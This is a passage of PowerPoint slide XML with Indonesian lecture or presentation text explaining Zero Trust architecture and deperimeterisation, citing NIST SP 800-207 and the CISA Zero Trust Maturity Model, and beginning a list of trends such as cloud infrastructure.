              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas statis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda-beda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. NIST SP 800-207 - https://csrc.nist.gov/publications/detail/sp/800-207/final.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Kematangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Nol CISA - https://www.cisa.gov/zero-trust-maturity-model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Deperimeterisasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Deperimeterisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas-batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengadopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deperimeterisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganjurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, di mana pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tren yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Deperimeterisasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Enterprise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan cloud. Selain </a:t>
            </a:r>
            <a:r>
